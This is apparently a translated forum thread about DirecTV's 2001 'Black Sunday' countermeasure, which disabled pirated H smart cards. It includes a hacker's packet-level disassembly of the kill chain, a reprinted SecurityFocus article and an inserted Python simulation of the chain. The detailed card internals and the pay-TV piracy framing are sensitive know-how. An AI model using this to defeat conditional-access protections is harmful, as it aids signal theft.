

Black Sunday in the USA and Canada


Recommended posts

Posted:

On the site www.securityfocus.com, on page 143, I found yesterday an extensive report of what tester had briefly summarised on this board. The article was written by Kevin Poulsen on 25 January. Unfortunately they are working on the site this weekend and it is off the internet until Sunday. I did print the piece, but it is too long to type in here. So here is only the technical description (roughly translated):

Just as here in Europe, cards in the USA can be written by the receiver. In the early 90s search-and-destroy programs were used, which damaged the software on cards with or without certain codes while you were watching TV.

The logical answer was to use read-only cards, so that search-and-destroy no longer worked.

In the USA you can and may (I hear various noises about the situation here) also write the software in the receiver.

Over a year ago DirecTV began writing a number of bytes to the card and at the same time the receiver software, which refused a card without the update. As a result either the cards were opened up again for updates, or the necessary bytes were put on the card by hand.

This went on for months: DirecTV kept writing new data both to the cards and to the receivers. In November they stopped writing, after a total of 63 updates to the so-called H cards.

Now these updates were not chosen at random; the data formed a real computer program on the H cards, sent byte by byte. Hackers analysed this program and understood that it could be triggered to permanently de-activate the card. All of this on command and remotely.

Last Sunday DirecTV gave the command, whereby an endless loop is written to the "write once" part of the card memory. Since this part cannot be changed, the card is unusable. In fact they could have given this command back in November, but they waited until January.

Many thousands of cards appear to have been made unusable, but not all. Besides the H cards there are also HU cards, PC emulations and of course H cards with write protection. These cards, and of course original cards, still work in the States.

---------------------------------------------

Now I don't know whether it is technically possible and/or legal to do the same here. Maybe this is the big blow that C+ predicted it would deal, of which a few people are now victims (see elsewhere on the site).

------------------
abc


Posted:

Here follows an English-language description of how the H cards in the USA and Canada were written to death last Sunday. Source: http://www.dr7.com

This evening at approximately 8:30 pm PST DirecTV struck with a vengeance and unleashed what will long be known as "Black Sunday"; below is an accurate and detailed explanation by Magician.

BEGIN QUOTE:

As most everybody is aware, the ability of the dynamic code to execute a kill-type ECM was displayed today on "Black Sunday".

First, the bad news: the ECMs wrote 4 bytes to the "write once" area of the EEPROM, 8000h-8003h. Unfortunately, one of the bytes that is changed is 8000h, which is checked extremely early in the ROM startup code (003Fh) to see if it contains "33h". These ECMs re-wrote this byte to "00h", which means that it very quickly enters an infinite loop because "P1.7" is not set. Since this area of the H card is "write once", there is no way to reset this byte back to "33h" to allow normal startup to continue, even by way of an unlooper.

Second, for those interested, here are all the EEPROM addresses that were tested to see if they contained modified bytes. Each byte was tested in its own packet (i.e., one address at a time):

code:--------------------------------------------------------------------------------
8243                        Vector for setting DPTR to ZKT secret vector
8246,8247                   Vector for Cmd09 vector
8255                        Vector for Ins58 patch vector
8258                        Ins44 preprocessing vector
825B                        Ins44 extras vector
825E                        Find tier or PPV vector
8264                        "EndInsHandling" vector
8273                        Cmd1F vector
827C,827D                   Ins54 vector
8282,8283                   Ins18/Ins1A vector
8440                        First byte of channel blackout data (checked if non-zero)
8582,858C,8593              Cmd60 code
85B7                        B7 nano vector
85BE                        BD nano vector
85C0,85C1,85C2              C0 nano vector
85C3                        C3 nano vector
85C6,85C7                   C6 nano vector
85E2,85E6,85ED,85EF,85F6    B5 nano code
8606,8608,8611              AddAToDfdNanoBufIfFlOpn code
8630                        Deferred Cmd60 processing code
86DD                        Never-executed portion of old C6 nano code
87A1                        Old CF nano jump table
8800                        Hash algorithm code
8955                        Main loop vector code
8973                        Ins18/Ins1A code
8975                        Ins54 check code
8982                        Setup for Ins38 code
89A0,89A3                   Setup for Ins44 code
89A6,89B2,89B9              Setup for Ins4C code
89DF                        End of main loop vector code
8BFE                        Cmd0C code
8CC7,8CCA,8CCB              Preprocess deferred Cmd60 code
8CD9,8CDE                   Cmd0B for non-virgin cards code
8CF2,8CFE                   Ins58 patch code
8D04,8D09,8D0D,8D11,8D14,8D17,8D1A,8D1D,8D20,8D22,8D24,8D25,8D32    Ins54 code
8D66,8D6A,8D72,8D76         Add ASIC bytes to signature hash code
8DD0,8DD3,8E68              Do 1 hash iteration code
8F2F                        Preprocess Cmd09 code
8F53                        Cmd0C patch 1 code
--------------------------------------------------------------------------------

Here is an example dynamic code packet (for the 8D1Ah address; all of the addresses were tested using similar packets, except for 8440h which used a JNZ instead of JZ):

code:--------------------------------------------------------------------------------
C3 nano used to preset RAM locations 10h-1Fh:

C3 0A 00 20 99 03 AF 01 00 04 00 09    | Seed hash only (using 9 data bytes)

results in these bytes at 10h-1Fh:

20 99 03 AF 01 00 04 00 09 CB 29 71 06 19 74 D0

10h  20   What 8D1Ah is compared to
11h  99   Lo byte of 3rd loop return address
12h  03   Hi byte of 3rd loop return address
13h  AF   Lo byte of 2nd loop return address
14h  01   Hi byte of 2nd loop return address
15h  00   Lo byte of 1st loop return address and first byte loaded in EEPROM write register
16h  04   Hi byte of 1st loop return address and second byte loaded in EEPROM write register
17h  00   Third byte loaded in EEPROM write register
18h  09   Fourth byte loaded in EEPROM write register

The C9 nano looked like this:

C9 10 20 90 8D 1A E0 47 60 08 90       | Write 15 bytes+RET, execute and hash
80 00 78 15 75 81 16

which caused this code to be executed:

893C  mov  DPTR,#8D1Ah
893F  movx A,@DPTR
8940  xrl  A,@R1
8941  jz   894Bh
8943  mov  DPTR,#8000h
8946  mov  R0,#15h
8948  mov  SP,#16h
894B  ret
--------------------------------------------------------------------------------

Remember, R1 starts equal to 10h. So the above code does the following:

Compare 8D1Ah to @10h (which contains #20h)
If they match, simply return
Otherwise, set DPTR to 8000h
Set R0 to 15h
Reset the stack to 16h and RET, to resume execution at 0400h to load "00 04 00 09" into the EEPROM write register, which RETs to 01AFh to enable EEPROM write mode, which RETs to 0399h to write 00 04 00 09 to 8000-8003h.

In addition, there was an ECM to detect H cards running with non-H CAM IDs, although this packet did not loop the card but simply "locked it up" until the next reset:

code:--------------------------------------------------------------------------------
C3 nano used to preset RAM locations 10h-1Fh:

C3 0B 00 FE FC 32 00 00 04 AC 01 68 14    | Seed hash only (using 10 data bytes)

results in these bytes at 10h-1Fh:

FE FC 32 00 00 04 AC 01 68 14 8A DF A3 AA 81 34

10h  FE   Mask ANDed with the first CAM ID byte (see below)
11h  FC   Mask ANDed with the second CAM ID byte (see below)
12h  32   Lo byte of 4th loop return address
13h  00   Hi byte of 4th loop return address
14h  00   Lo byte of 3rd loop return address
15h  04   Hi byte of 3rd loop return address
16h  AC   Lo byte of 2nd loop return address
17h  01   Hi byte of 2nd loop return address
18h  68   Lo byte of 1st loop return address
19h  14   Hi byte of 1st loop return address

The C9 nano looked like this:

C9 12 20 90 83 74 81 60 07 57 70       | Write 17 bytes+RET, execute and hash
05 09 B9 12 F6 22 75 81 19

which caused this code to be executed:

893C  mov  DPTR,#8374h
893F  movx A,@DPTR++
8940  jz   8949h
8942  anl  A,@R1
8943  jnz  894Ah
8945  inc  R1
8946  cjne R1,#12h,893Fh
8949  ret
894A  mov  SP,#19h
894D  ret
--------------------------------------------------------------------------------

Remember, R1 starts equal to 10h. So the above code does the following:

If first byte of CAM ID is 00, return (everything OK).
Otherwise, AND first CAM ID byte with byte @10h (#FEh)
If result is non-zero (meaning first CAM ID byte is not 01h), go to ECM routine
Otherwise, AND second CAM ID byte with @11h (#FCh)
If result is non-zero, go to ECM routine
Otherwise, return (everything OK)

The ECM routine resets the SP to cause the RET to resume execution at 1468h, which RETs to 01ACh, which RETs to 0400h, which RETs to the infinite loop at 0032h...

END QUOTE
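The two packets in Magician's quote are a small return-oriented chain: the C3 nano stages return addresses (and the four bytes to be written) in RAM 10h-1Fh, and the 15-byte program the C9 nano executes does nothing but pivot SP into that RAM and RET, so existing ROM routines do the actual damage. The Python below is an added example, not code from the post or from any DirecTV/NDS firmware. It replays both chains with 8051 RET semantics using the post's own RAM bytes, SP values and addresses; the behaviour of ROM routines 0400h, 01AFh, 0399h and 0032h is taken from the post, routines 1468h and 01ACh are assumed to simply return (the post does not describe them), the write-once EEPROM is simplified to "the first write sticks", and all EEPROM contents, including the patched value 7Fh at 8D1Ah on the "hacked" card, are constructed for the example.

```python
# Added example (not from the post, not DirecTV/NDS firmware): a model of the
# "dynamic code" stack pivot.  ROM routine behaviour for 0400h/01AFh/0399h/0032h
# follows the post; 1468h and 01ACh are assumed to be plain returns; the
# write-once EEPROM is simplified to "first write sticks, later writes ignored".

RAM_BASE = 0x10                      # the C3 nano presets RAM 10h-1Fh
OTP_START, OTP_END = 0x8000, 0x8003  # "write once" EEPROM area named in the post
MAGIC = 0x33                         # ROM startup (003Fh) expects this at 8000h

# RAM 10h-1Fh after each C3 nano, exactly as listed in the post
KILL_RAM = bytes.fromhex("20 99 03 AF 01 00 04 00 09 CB 29 71 06 19 74 D0")
CAMID_RAM = bytes.fromhex("FE FC 32 00 00 04 AC 01 68 14 8A DF A3 AA 81 34")


class Card:
    """Just enough 8051 and EEPROM state to follow the RET chains."""

    def __init__(self, preset_ram, eeprom):
        self.ram = bytearray(256)
        self.ram[RAM_BASE:RAM_BASE + 16] = preset_ram
        self.eeprom = dict(eeprom)       # address -> byte (constructed contents)
        self.otp_burned = set()          # OTP addresses already programmed
        self.sp, self.dptr, self.r0 = 0x07, 0x0000, 0x00
        self.write_reg, self.write_enabled = b"", False
        self.trace, self.halted = [], False

    def ret(self):
        """8051 RET: PCH <- (SP); SP--; PCL <- (SP); SP--."""
        pch, pcl = self.ram[self.sp], self.ram[self.sp - 1]
        self.sp -= 2
        return (pch << 8) | pcl

    def eeprom_write(self, addr, value):
        if OTP_START <= addr <= OTP_END:
            if addr in self.otp_burned:
                return                   # write once: the byte can never be changed back
            self.otp_burned.add(addr)
        self.eeprom[addr] = value

    # ROM routines that the staged return addresses land in
    def rom_0400(self):                  # load 4 bytes from @R0 into the EEPROM write register
        self.write_reg = bytes(self.ram[self.r0:self.r0 + 4])

    def rom_01af(self):                  # enable EEPROM write mode
        self.write_enabled = True

    def rom_0399(self):                  # commit the write register to EEPROM at DPTR
        if self.write_enabled:
            for i, b in enumerate(self.write_reg):
                self.eeprom_write(self.dptr + i, b)

    def rom_0032(self):                  # infinite loop: the card is dead until reset
        self.halted = True

    def run_chain(self, new_sp):
        """mov SP,#new_sp ; ret -- then keep RETurning through the preset bytes."""
        handlers = {0x0400: self.rom_0400, 0x01AF: self.rom_01af,
                    0x0399: self.rom_0399, 0x0032: self.rom_0032,
                    0x1468: lambda: None, 0x01AC: lambda: None}   # assumed plain returns
        self.sp = new_sp
        while not self.halted and self.sp - 1 >= RAM_BASE:
            addr = self.ret()
            self.trace.append(addr)
            handlers.get(addr, self.rom_0032)()   # unknown address: treat as a hang
        return list(self.trace)


def kill_ecm(card, probe=0x8D1A):
    """The 893Ch code from the post: does EEPROM[probe] still match @R1 (RAM 10h)?"""
    if (card.eeprom.get(probe, 0) ^ card.ram[0x10]) == 0:
        return "ok"                      # jz 894Bh -> ret, card left alone
    card.dptr, card.r0 = 0x8000, 0x15    # mov DPTR,#8000h ; mov R0,#15h
    card.run_chain(0x16)                 # mov SP,#16h ; ret
    return "killed"


def camid_ecm(card, cam_id):
    """The 8374h loop: first CAM ID byte AND FEh and second AND FCh must both be zero."""
    r1 = 0x10
    for b in cam_id:                     # movx A,@DPTR++
        if b == 0:
            return "ok"                  # jz 8949h -> ret
        if b & card.ram[r1]:             # anl A,@R1 ; jnz 894Ah
            card.run_chain(0x19)         # mov SP,#19h ; ret
            return "locked"
        r1 += 1
        if r1 == 0x12:                   # cjne R1,#12h,893Fh falls through -> ret
            return "ok"
    return "ok"


def boots(card):
    """ROM startup check at 003Fh: continue only if 8000h still reads 33h."""
    return card.eeprom.get(0x8000) == MAGIC


def demo():
    """Constructed cards: a clean one and one whose Ins54 code at 8D1Ah was patched."""
    base = {0x8000: MAGIC, 0x8001: 0xFF, 0x8002: 0xFF, 0x8003: 0xFF}   # constructed
    clean = Card(KILL_RAM, {**base, 0x8D1A: 0x20})
    hacked = Card(KILL_RAM, {**base, 0x8D1A: 0x7F})   # 7Fh is a made-up patched value
    results = {"clean": kill_ecm(clean), "hacked": kill_ecm(hacked)}
    hacked.eeprom_write(0x8000, MAGIC)   # an "unlooper" trying to put 33h back: no effect
    return results, hacked, boots(clean), boots(hacked)
```

`demo()` returns "ok" for the clean card and "killed" for the patched one, whose trace is 0400h, 01AFh, 0399h and whose 8000h-8003h now hold 00 04 00 09; the later attempt to restore 33h is swallowed by the write-once region, so `boots()` stays False. The thing worth noticing is how little the hashed packet has to carry: the kill itself is not in the 15 bytes, only a `mov SP` that points the stack at bytes already sitting in RAM, and the card's own ROM then writes the EEPROM.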

Posted:

Here is a description of what happened in the USA last week (the site is down again, so here is a copy of the text).

DirecTV zaps hackers
Electronic warfare tactics wipe out thousands of hacked smart cards.
By Kevin Poulsen <klp@securityfocus.com>
January 25, 2001 11:46 AM PT

Satellite television behemoth DirecTV struck a decisive blow against signal pirates Sunday night, when it transmitted a carefully crafted electronic message from its orbiting satellites and destroyed thousands of hacked smart cards, which for the last four years allowed pirates to gain free access to hundreds of channels of programming.

According to sources in the satellite TV underground, the vast majority of illicitly reprogrammed DirecTV access cards, which once had a street value of several hundred dollars each, were wiped out on what hackers are calling "Black Sunday."
[...]

"It turned all these cards into ice scrapers," says a California pirate.

A spokesman for California-based DirecTV says company policy prevents him from confirming a specific cyber-strike. "But I will tell you that we do, from time to time, use electronic countermeasures," says spokesman Robert Mercer. "Obviously, we want only authorized people to receive our service."

DirecTV has been grist for pirates almost since inception, primarily due to well-funded research efforts in Canada, where the company is not licensed to provide service, and selling hacked access cards and equipment is not a crime.

"It's certainly a problem," says Mercer. "But we have an Office of Signal Integrity, a group of former FBI agents, dedicated to this issue."

The company reportedly acquired the ability to launch the electronic countermeasure (ECM) against pirates in November of last year, but held off on using it until Sunday. The massive counter-hack comes amid negotiations between DirecTV's parent company, General Motors, and media mogul Rupert Murdoch, who's considered acquiring DirecTV for an estimated $40 billion.

DirecTV controls access to their signal through smart cards shipped with every system. Each plastic card resembles a credit card, but is in fact a completely self-contained microcomputer with its own embedded software and memory. In normal operation, a subscriber inserts the card into a slot in the DirecTV receiver, and a satellite signal from the company tells the receiver which channels, if any, the subscriber is allowed to watch, based on the unique identification number coded into each card.

Sunday's ECM was aimed at hacked 'H' series smart cards. The H cards were shipped with receivers sold from late 1996 to early 1999, and later became valuable commodities among TV pirates as the technology to hack them plummeted in price, and the techniques became publicly known online. Card programming devices were sold through Canadian dealers, and hacker-authored software for the H card that allowed complete access to all programming -- including movie channels, sports and pay-per-view events -- was easily found on the Internet.

By most estimates, thousands of hacked H cards are circulating in the U.S. alone. They all became useless Sunday night, when DirecTV detonated a devilishly clever logic bomb the company planted in the access cards last year.

According to sources in the TV piracy underground, the counterstrike was the capstone to four years of electronic warfare over the H card.

DirecTV's system gives them the ability to reprogram smart cards remotely, through the set top receivers. In the 90's, the company used that capability in their initial response to the proliferation of hacked cards by broadcasting a search-and-destroy program to all the H cards that would look for hacked code, and damage the software in any cards that had it.

To counter that technique, hackers developed a method of making the cards "read only" after hacking them, so that DirecTV could no longer put their search-and-destroy programs onto the cards.

But DirecTV reacted to that wrinkle over a year ago, by taking advantage of their ability to remotely reprogram the set top satellite receivers, as well as the cards. The company sent a few specific bytes of data to all the H cards, while simultaneously reprogramming the satellite receivers to reject cards that didn't reflect the change. This forced hackers to update the cards manually with the new data, or to make the cards writable again.

Through the following months, DirecTV continued to add more data using this tactic. By the time they stopped in November, the company had made a total of sixty-three updates to the H cards.

By then, the hackers realized that the data was not arbitrarily chosen: DirecTV was actually sending a computer program to the H cards, a few bytes at a time. After analysis, the hackers predicted that the program would make it possible for the company to permanently disable the pirated cards on command.

DirecTV finally issued that command on Sunday, and used it to inject an endless loop into a "write once" section of the H cards' memory, which can not be modified a second time, according to an analysis on one satellite TV hacking site (http://www.dr7.com).

"Why they didn't do it back in November is a big mystery," says the California hacker.

While "Black Sunday" was a devastating blow to pirates, it's not likely to end the electronic arms race between DirecTV and its hackers.

The company's current generation of smart cards, the so-called 'HU' card, has proven more resistant to tampering than its predecessor, but hacked versions are now turning up on the commercial gray market. Another technique, in which a pirate uses a PC to emulate an access card, was reportedly unaffected by the Sunday blast.

Smart cards are used for a variety of applications, including electronic customer identification for wireless GSM phones in Europe, and as new credit card offerings from Visa and American Express. "Smart cards are considered highly tamper resistant," says Don Davis, editor of Card Technology magazine. "There have been incidents where people have been able to attack them and tamper with them, but not very many that have proven to have commercial impact, like the problem DirecTV has had."

The article could be found at: http://www.securityfocus.com/news/143

In my view the same background and techniques used in Spain and America are also being used here. At Kanaal Digitaal (across all of Europe) they are certainly not going to reinvent the wheel if that has already been done in the USA.

Seems to me fairly simple to check whether the same damage has been done and whether the same destructive program is present.

------------------
abc

Posted:

The whole story (interesting, by the way!) stands or falls with writing into a write-once memory. The question is whether that is even present on the C+ cards.
Moreover, it would then have to show up while logging.
What C+ can do is load a program via their own receivers that checks something on the card and, if it doesn't match, switches the receiver off.

Posted:

We will have little trouble with it here.
1/ The cards from the USA come from News Datacom (yes, the same manufacturer that supplies BSkyB with its cards), and our cards (se** and ir****) come from ??
2/ The News Datacom cards have a kind of built-in ASIC. This is a processor with an algorithm in it that cannot, or can hardly, be read out or reverse-engineered, because you suddenly have to deal with 2 algorithms.
These cards are therefore far ahead of ours and absolutely not comparable to our ACS 1.2 and Seca cards, rather to the BSkyB digicard. The problem of the write-once memory is not new either; it is a known phenomenon since the 09 BSkyB period. Those cards also had something like it. If your card was killed (invalid card), then there really was no sound to be got out of it at all any more. This normally only happened if you had opened these (Quickstart) cards via the Phoenix. If you hadn't paid your subscription, the card gave the "please call" message. Unfortunately BSkyB and News Datacom have only learned from this, and we are the ones left behind.
peter

Unhindered by any form of technical knowledge, I cheerfully stick my screwdriver and soldering iron into everything.
